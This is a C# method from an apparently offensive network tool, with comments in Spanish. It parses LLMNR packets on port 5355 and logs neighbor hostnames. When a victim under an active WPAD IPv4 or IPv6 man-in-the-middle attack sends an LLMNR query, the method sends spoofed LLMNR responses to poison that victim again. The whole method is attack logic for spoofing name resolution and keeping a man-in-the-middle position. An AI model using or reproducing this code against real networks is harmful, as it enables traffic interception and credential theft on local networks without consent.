private void AnalyzeLLMNR(Packet packet) { if (!(packet is EthernetPacket)) return; // IPv4 y IPv6 if (packet.PayloadPacket.PayloadPacket is UdpPacket) { // Respuestas de LLMNR. De aqui podemos capturar el nombre. if ((((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort == 5355) && (((EthernetPacket)packet).Type == EthernetPacketType.IpV4)) { LLMNR.LLMNRAnswer LLMNRAnswer = new LLMNR.LLMNRAnswer(packet.PayloadPacket.PayloadPacket.PayloadData); // Solo lo cojemos las respuestas que son de tipo PTR o de tipo A if (LLMNRAnswer.isPtrResponse == true && LLMNRAnswer.computerName != string.Empty) { Neighbor neighbor = Program.CurrentProject.data.GetNeighbor(((EthernetPacket)(packet)).SourceHwAddress); if (neighbor == null) { neighbor = new Neighbor(); neighbor.computerName = LLMNRAnswer.computerName; neighbor.AddIP(LLMNRAnswer.ipAddress); neighbor.physicalAddress = ((EthernetPacket)(packet)).SourceHwAddress; Program.CurrentProject.data.AddNeighbor(neighbor); NewNeighbor(this, new NeighborEventArgs(neighbor)); } else { neighbor.computerName = LLMNRAnswer.computerName; Program.CurrentProject.data.AddNeighbor(neighbor); } } } if ((((EthernetPacket)packet).Type == EthernetPacketType.IpV4) && (((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort == 5355)) { SynchronizedCollection<Attack> lstAttacks = Program.CurrentProject.data.GetAttacks(); // En caso de MITM ARP -> Si el equipo está intentando restablecer su tabla ARP ... se le vuelve a envenenar foreach (Attack attk in lstAttacks.Where(A => A.attackType == AttackType.WpadIPv4 && A.attackStatus == AttackStatus.Attacking)) { MitmAttack mitmAtt = (MitmAttack)attk; if (((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress.Equals(mitmAtt.t2.ip)) WpadIPv4Attack.Instance.GenerateLLMNRResponse(packet); } } if ((((EthernetPacket)packet).Type == EthernetPacketType.IpV6) && (((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort == 5355)) { SynchronizedCollection<Attack> lstAttacks = Program.CurrentProject.data.GetAttacks(); // En caso de MITM ARP -> Si el equipo está intentando restablecer su tabla ARP ... se le vuelve a envenenar foreach (Attack attk in lstAttacks.Where(A => A.attackType == AttackType.WpadIPv6 && A.attackStatus == AttackStatus.Attacking)) { MitmAttack mitmAtt = (MitmAttack)attk; if (((IPv6Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress.Equals(mitmAtt.t2.ip)) WpadIPv6Attack.Instance.GenerateLLMNRResponse(packet); } } } }